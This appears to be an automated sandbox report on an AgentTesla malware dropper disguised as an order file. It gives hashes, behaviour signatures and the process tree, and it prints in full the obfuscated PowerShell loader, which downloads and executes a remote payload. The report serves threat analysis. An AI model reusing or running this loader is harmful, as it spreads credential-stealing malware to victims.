Overview

overview

10

Static

static

1

order nr. ...00.vbe

windows10-2004-x64

10

order nr. ...00.vbe

windows11-21h2-x64

10

Analysis

  • max time kernel
    292s
  • max time network
    213s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250410-en
  • resource tags

    arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23/04/2025, 06:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    order nr. 0123 for 1.000.vbe

  • Size

    28KB

  • MD5

    592f0484a76de4f5edd8f9bd9d48e6c8

  • SHA1

    8b72670572d4a1be6ae92ec5dbd3eec658e0ed66

  • SHA256

    dfb92d282ba5ff519b2439265d3c9257bc23d7eceb05fc969eada0060cb23380

  • SHA512

    47621868e8fb52cc671d819a3d7941ba39975ddd8dd92b3e2efc51b7653ece679c97d59195523919b3a661b82c83ef0a572f17b68ad7e4dbda5626ec75798874

  • SSDEEP

    768:GAmGerlP5Z/JlYRhCn+CHdR0NnKem5y+QwJMOHR:HmGehPXxuRGdm/msTwJMOx

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\order nr. 0123 for 1.000.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5200
    • C:\Windows\System32\Wbem\wmic.exe
      wmic diskdrive get caption,serialnumber
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Trawlets131='func';Get-History;$Trawlets131+='t';Get-History;$Trawlets131+='i';$Brandmelders=1;$Trawlets131+='on:';$Brandmelders=1;(n`i -p $Trawlets131 -n Binarium -value { param ($Fishmonger15);$buddying=2;do {$Unexcrescent+=$Fishmonger15[$buddying];$buddying+=3} until(!$Fishmonger15[$buddying])$Unexcrescent});(n`i -p $Trawlets131 -n Turbolampen -value {param ($Skoleskemaet);.($Cyathia18) ($Skoleskemaet)});ConvertTo-Html;$Cockaleekie=Binarium 'BuN KEInTTh.Oxw';$Cockaleekie+=Binarium ' rEBrbIgCA.lKoIReEG NDaT';$Sprogrigtighedssprgsmaal=Binarium 'LaM loSkz,oiLylV l Aa d/';$Onicolo=Binarium ' aT PlDescr1 e2';$Solnedgangen='av[Mon MEAkTO,. oS Se.lREnV FiTeCM e epMoO dIelNUnTR,MJ aSpnTha,og efuR.i],m:S :LaSPre DCKeUKar ISit aYUnpI.R oOcTU,ONoc noAul R=S $GaoLantaiboCMaoAlLOlo';$Sprogrigtighedssprgsmaal+=Binarium 'He5Sk. 0Ve Mo( aWCoi TnFrdSuoAnwUdsJa ReNBvTfo k1 l0Ko.In0Ma;C tWKoiKinUd6fr4,m;Sv Rax .6 C4Pe; g r PvSt:Ge1Pr3 D7lo..a0de)kl UGPeeBac ,kkooL /Kl2F 0Aa1K,0S 0 r1.o0K 1 S SeFVii ru e,ofDro Sx D/C,1Ud3Ba7Te. I0';$Uppertendom=Binarium 'PouwiSSaeFeRB.- sASaG eET,NPot';$Skildringernes=Binarium 'Foh ltBjtFap .sF.:Fo/ i/Imd,erOciS,vLoeO..Teg Po.eoLug lOmeM..Jac EoComNi/KouUdc v?Ree .xAsp eoFerBltRe= hdAao,uw noml ro NaKedJ &LeiSad o=G,1 -M B S1MiuU 5BaqD 0AfnBaF .1 Sp.oQK u Rh .0SkBSewyeC 3,o_FuX.ayIs7 aN ,R LmAm0 7Im3CelFosIle';$khulda=Binarium 'th>';$Cyathia18=Binarium ' bi e oX';$Kontormedhjlperen='Hymnists142';$Smrekanders='\Eftermlets.Trk';Turbolampen (Binarium 'Ve$DyGBlL VogaB.ma PLTi: ouCenT.D ke elHuIhegjeHNat SFHeU.olPa=.u$EpeInnUnV :JuaK.pP pLiDI,A ttKeALy+Pr$ IsM MDaR nEAcKL a TnAfDorEArr PS');Turbolampen (Binarium 'cl$HigbolGaOAbbStaCrL .: s BUSlB DMFoi SLStIBlABlRBoYQu= $Sos eK UIBil ,DLar eI,inUkgMoeOvR pNDeeExSGr. SSUbpV,lAvI et U(Sp$ AK UHbaUFiLSpDFiA,s)');Turbolampen (Binarium $Solnedgangen);$Skildringernes=$Submiliary[0];$Monkeypot=(Binarium ' $ uGFilExoC b aV LS,: rtBeR SUAcmC FKoEFuNPoS A=Sen MEStWTr-OpoTrb TJGaeFoC otE NsSyYA,sInTKoE,nm l. i$BiCLaORec KfrAJaL.uEA eD k .IRaE');Turbolampen ($Monkeypot);Turbolampen (Binarium 'B $ TGlr iu.imEsfToeSyn usFa. .H ae.oaKad.ne lrBosK [Te$EvU Bp,ep.ceForDot,pePhnStdDeobum a]Fl=Hu$BlSI pHorMioCug dr ui ogEntBeiH,gMohCreVad sA,sOmpPrr.ag IsAkm aunaNol');$Sinners133=Binarium 'seDUloElwHenG.lF o paUndS,FNoi lAre';$Systemskiftet191=Binarium 'Ca$M.T drSauTrmFofGreBlnSasPr.In$ hSsaiI n Fn eeSarBus P1B 3Si3Bl.emIB nKrvFoo.ikM eKl(Di$ eSOvkSpi Ll DdGor aiLen Sg .e NrSinVie ,sud, A$ OSReo MnScdT eSprSte Msam)';$Sonderes=$Undelightful;Turbolampen (Binarium ' n$.iG BlDiO lB GAJulGa: rtS,OGomwoE arSySLe=Di(SuTTaeT.s KTMa- MP aAOsTC,h,e $gasMooPsNMeDInETjrLiEUdsHm)');while (!$Tomers) {Turbolampen (Binarium ' B$T,g SlEnoPibReaKal,e: aC AoRguH,nMot oe orQud nie.sAdtIsi.onS g buU iAtsFrh.i=Ti$MiVUmi BdSpnFle .f Oo,irY kE l.aa ar iPlnTug ,eLyrSus') ;Turbolampen $Systemskiftet191;Turbolampen (Binarium 'In[S T h DrDeEJ.aSidTei oNicG l. Dt lh iRAtEStASod ]Sk: .:Cos L eEGoePapEm(Ul4S 0 T0 a0Un)');Turbolampen (Binarium ' M$Mbg GLDrOShbGiaCaLin:UntRaOUrmWiES,rCeSMa= V(.oTDeeR sLoTGl-I p.oa .T hPo C$Mis .oTaN.oDMye vrUnESmsJa)') ;Turbolampen (Binarium ' e$T GMeLWaObrbSkaStLVa: SF naTrlCosKuKMaS KPp IK lKol UEMit a=Kn$SaGS,L GOMeB Ia,hl.x: dfO,O nR DEDicHaLDaaT w,e+He+Au%Di$Grs DUT bHomFyI.elPrI.kaSeRInyT .chc,iOMou FnIsT') ;$Skildringernes=$Submiliary[$Falskspillet]}$Antilog=393639;$Alcali191=27761;Turbolampen (Binarium '.n$PrGJaL Do .BSpADeLP :.ap eOAuSTiTM XFrhKurTh Pi=Pa AG FERuTAn-c,c eOInNSetLae.rnFatO ,e$F,SA O .nDed EC r ,e BS');Turbolampen (Binarium 'G $Pug l,uoG bUda PlTh:neSKomB mNoe ,tM 7 F0He Fi= o B,[KaSSsyF s nt Fe lmSt.NoCFuoCrn.av oe SrA t,r]fo:B :K F SrNio RmKiBDiaChsSpe,h6ne4PeS ,tFerApi.in DgB (Be$KeP eoAcsPrtunxdrh irFr)');Turbolampen (Binarium 'Bo$IrG slStoKabPraOml,t:BoTDiJMaEUbN HE is aTMeEPiMDeafon HdgrsPraD,g ,e lRtrnPie rSDi V= F no[PeS.oyCasSkTS.eRemAb. otCuEB x TBa.SkEmeNNeCStOU,d ILgN,agSe].u:O :.ea,asPaCKoI Ai T. cgMaETaT.lsDiTUnrG i.iN gKr( e$G,SW mRem,iE .tVe7P,0Pu)');Turbolampen (Binarium 'Ko$ oG ,l Ho DbPyaSuLUd:D.s pk hr NaDoEPrDTad oE CRTi=Fa$ MT TJGlEBenAre SSFeTUneF m aStn ed s.saVeg oE RIzN,yEInsAc.stsEvuAfBAfS ATunrcriTeNA gBe( J$ aC.n StT IkilMaoDeG d,Me$.rA lRoC Aa SLLyiK.1br9,y1 e)');Turbolampen $Skraedder;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2056
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Trawlets131='func';Get-History;$Trawlets131+='t';Get-History;$Trawlets131+='i';$Brandmelders=1;$Trawlets131+='on:';$Brandmelders=1;(n`i -p $Trawlets131 -n Binarium -value { param ($Fishmonger15);$buddying=2;do {$Unexcrescent+=$Fishmonger15[$buddying];$buddying+=3} until(!$Fishmonger15[$buddying])$Unexcrescent});(n`i -p $Trawlets131 -n Turbolampen -value {param ($Skoleskemaet);.($Cyathia18) ($Skoleskemaet)});ConvertTo-Html;$Cockaleekie=Binarium 'BuN KEInTTh.Oxw';$Cockaleekie+=Binarium ' rEBrbIgCA.lKoIReEG NDaT';$Sprogrigtighedssprgsmaal=Binarium 'LaM loSkz,oiLylV l Aa d/';$Onicolo=Binarium ' aT PlDescr1 e2';$Solnedgangen='av[Mon MEAkTO,. oS Se.lREnV FiTeCM e epMoO dIelNUnTR,MJ aSpnTha,og efuR.i],m:S :LaSPre DCKeUKar ISit aYUnpI.R oOcTU,ONoc noAul R=S $GaoLantaiboCMaoAlLOlo';$Sprogrigtighedssprgsmaal+=Binarium 'He5Sk. 0Ve Mo( aWCoi TnFrdSuoAnwUdsJa ReNBvTfo k1 l0Ko.In0Ma;C tWKoiKinUd6fr4,m;Sv Rax .6 C4Pe; g r PvSt:Ge1Pr3 D7lo..a0de)kl UGPeeBac ,kkooL /Kl2F 0Aa1K,0S 0 r1.o0K 1 S SeFVii ru e,ofDro Sx D/C,1Ud3Ba7Te. I0';$Uppertendom=Binarium 'PouwiSSaeFeRB.- sASaG eET,NPot';$Skildringernes=Binarium 'Foh ltBjtFap .sF.:Fo/ i/Imd,erOciS,vLoeO..Teg Po.eoLug lOmeM..Jac EoComNi/KouUdc v?Ree .xAsp eoFerBltRe= hdAao,uw noml ro NaKedJ &LeiSad o=G,1 -M B S1MiuU 5BaqD 0AfnBaF .1 Sp.oQK u Rh .0SkBSewyeC 3,o_FuX.ayIs7 aN ,R LmAm0 7Im3CelFosIle';$khulda=Binarium 'th>';$Cyathia18=Binarium ' bi e oX';$Kontormedhjlperen='Hymnists142';$Smrekanders='\Eftermlets.Trk';Turbolampen (Binarium 'Ve$DyGBlL VogaB.ma PLTi: ouCenT.D ke elHuIhegjeHNat SFHeU.olPa=.u$EpeInnUnV :JuaK.pP pLiDI,A ttKeALy+Pr$ IsM MDaR nEAcKL a TnAfDorEArr PS');Turbolampen (Binarium 'cl$HigbolGaOAbbStaCrL .: s BUSlB DMFoi SLStIBlABlRBoYQu= $Sos eK UIBil ,DLar eI,inUkgMoeOvR pNDeeExSGr. SSUbpV,lAvI et U(Sp$ AK UHbaUFiLSpDFiA,s)');Turbolampen (Binarium $Solnedgangen);$Skildringernes=$Submiliary[0];$Monkeypot=(Binarium ' $ uGFilExoC b aV LS,: rtBeR SUAcmC FKoEFuNPoS A=Sen MEStWTr-OpoTrb TJGaeFoC otE NsSyYA,sInTKoE,nm l. i$BiCLaORec KfrAJaL.uEA eD k .IRaE');Turbolampen ($Monkeypot);Turbolampen (Binarium 'B $ TGlr iu.imEsfToeSyn usFa. .H ae.oaKad.ne lrBosK [Te$EvU Bp,ep.ceForDot,pePhnStdDeobum a]Fl=Hu$BlSI pHorMioCug dr ui ogEntBeiH,gMohCreVad sA,sOmpPrr.ag IsAkm aunaNol');$Sinners133=Binarium 'seDUloElwHenG.lF o paUndS,FNoi lAre';$Systemskiftet191=Binarium 'Ca$M.T drSauTrmFofGreBlnSasPr.In$ hSsaiI n Fn eeSarBus P1B 3Si3Bl.emIB nKrvFoo.ikM eKl(Di$ eSOvkSpi Ll DdGor aiLen Sg .e NrSinVie ,sud, A$ OSReo MnScdT eSprSte Msam)';$Sonderes=$Undelightful;Turbolampen (Binarium ' n$.iG BlDiO lB GAJulGa: rtS,OGomwoE arSySLe=Di(SuTTaeT.s KTMa- MP aAOsTC,h,e $gasMooPsNMeDInETjrLiEUdsHm)');while (!$Tomers) {Turbolampen (Binarium ' B$T,g SlEnoPibReaKal,e: aC AoRguH,nMot oe orQud nie.sAdtIsi.onS g buU iAtsFrh.i=Ti$MiVUmi BdSpnFle .f Oo,irY kE l.aa ar iPlnTug ,eLyrSus') ;Turbolampen $Systemskiftet191;Turbolampen (Binarium 'In[S T h DrDeEJ.aSidTei oNicG l. Dt lh iRAtEStASod ]Sk: .:Cos L eEGoePapEm(Ul4S 0 T0 a0Un)');Turbolampen (Binarium ' M$Mbg GLDrOShbGiaCaLin:UntRaOUrmWiES,rCeSMa= V(.oTDeeR sLoTGl-I p.oa .T hPo C$Mis .oTaN.oDMye vrUnESmsJa)') ;Turbolampen (Binarium ' e$T GMeLWaObrbSkaStLVa: SF naTrlCosKuKMaS KPp IK lKol UEMit a=Kn$SaGS,L GOMeB Ia,hl.x: dfO,O nR DEDicHaLDaaT w,e+He+Au%Di$Grs DUT bHomFyI.elPrI.kaSeRInyT .chc,iOMou FnIsT') ;$Skildringernes=$Submiliary[$Falskspillet]}$Antilog=393639;$Alcali191=27761;Turbolampen (Binarium '.n$PrGJaL Do .BSpADeLP :.ap eOAuSTiTM XFrhKurTh Pi=Pa AG FERuTAn-c,c eOInNSetLae.rnFatO ,e$F,SA O .nDed EC r ,e BS');Turbolampen (Binarium 'G $Pug l,uoG bUda PlTh:neSKomB mNoe ,tM 7 F0He Fi= o B,[KaSSsyF s nt Fe lmSt.NoCFuoCrn.av oe SrA t,r]fo:B :K F SrNio RmKiBDiaChsSpe,h6ne4PeS ,tFerApi.in DgB (Be$KeP eoAcsPrtunxdrh irFr)');Turbolampen (Binarium 'Bo$IrG slStoKabPraOml,t:BoTDiJMaEUbN HE is aTMeEPiMDeafon HdgrsPraD,g ,e lRtrnPie rSDi V= F no[PeS.oyCasSkTS.eRemAb. otCuEB x TBa.SkEmeNNeCStOU,d ILgN,agSe].u:O :.ea,asPaCKoI Ai T. cgMaETaT.lsDiTUnrG i.iN gKr( e$G,SW mRem,iE .tVe7P,0Pu)');Turbolampen (Binarium 'Ko$ oG ,l Ho DbPyaSuLUd:D.s pk hr NaDoEPrDTad oE CRTi=Fa$ MT TJGlEBenAre SSFeTUneF m aStn ed s.saVeg oE RIzN,yEInsAc.stsEvuAfBAfS ATunrcriTeNA gBe( J$ aC.n StT IkilMaoDeG d,Me$.rA lRoC Aa SLLyiK.1br9,y1 e)');Turbolampen $Skraedder;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2908

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    66dfd36dbad071fbfb11ee7f611c9bc3

    SHA1

    11d59052e35c1d2eca92250c9e6590fff292f653

    SHA256

    a50f02bcf67e7671191add8b81908feb360c1c870ec9069dcaf19fe2dad9def5

    SHA512

    a59d3816cab11e0ddf6494d898777cd0825676e703ccc5d5e7e536b92eae1994057a6220a55ab923af189807ce01719fed0666d8e208f90845c40d82a9d4fd5c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uishx4wq.zyv.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Eftermlets.Trk
    Filesize

    548KB

    MD5

    148643eb609aae313d15b1294c34c502

    SHA1

    0c5cda2eb8a85d7ab7e89f9df45741fb4bddc7f5

    SHA256

    9ad4eab133957b5c0fe45073c2e82c511dd5714583cd24da48764c4e3c350564

    SHA512

    52c830a700fc93151da5b2bb5265edef91573df433da72685273f8e48669cf929348f0b2183958ae8320903521a76afc0559c290f1ea86bd939fab0676c677b5

    Download Submit

  • memory/2056-18-0x00007FFA788B0000-0x00007FFA79372000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2056-6-0x0000019855BF0000-0x0000019855C12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2056-13-0x00007FFA788B3000-0x00007FFA788B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2056-14-0x00007FFA788B0000-0x00007FFA79372000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2056-0-0x00007FFA788B3000-0x00007FFA788B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2056-11-0x00007FFA788B0000-0x00007FFA79372000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2056-10-0x00007FFA788B0000-0x00007FFA79372000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2908-62-0x0000000022B60000-0x0000000022B6A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2908-61-0x0000000022C00000-0x0000000022C92000-memory.dmp

    Filesize

    584KB

    Download

  • memory/2908-60-0x0000000022B10000-0x0000000022B60000-memory.dmp

    Filesize

    320KB

    Download

  • memory/2908-58-0x0000000000990000-0x0000000001CA7000-memory.dmp

    Filesize

    19.1MB

    Download

  • memory/2908-59-0x0000000000990000-0x00000000009D2000-memory.dmp

    Filesize

    264KB

    Download

  • memory/2908-57-0x0000000000990000-0x0000000001CA7000-memory.dmp

    Filesize

    19.1MB

    Download

  • memory/4868-21-0x0000000005200000-0x0000000005222000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4868-42-0x0000000008C00000-0x000000000B84A000-memory.dmp

    Filesize

    44.3MB

    Download

  • memory/4868-37-0x0000000006600000-0x000000000661A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4868-39-0x0000000007950000-0x0000000007EF6000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4868-36-0x0000000007070000-0x0000000007106000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4868-40-0x0000000008580000-0x0000000008BFA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4868-35-0x00000000060F0000-0x000000000613C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4868-38-0x0000000006650000-0x0000000006672000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4868-34-0x00000000060A0000-0x00000000060BE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4868-32-0x0000000005C00000-0x0000000005F57000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4868-23-0x0000000005A10000-0x0000000005A76000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4868-22-0x00000000052A0000-0x0000000005306000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4868-20-0x0000000005370000-0x000000000599A000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4868-19-0x0000000004C10000-0x0000000004C46000-memory.dmp

    Filesize

    216KB

    Download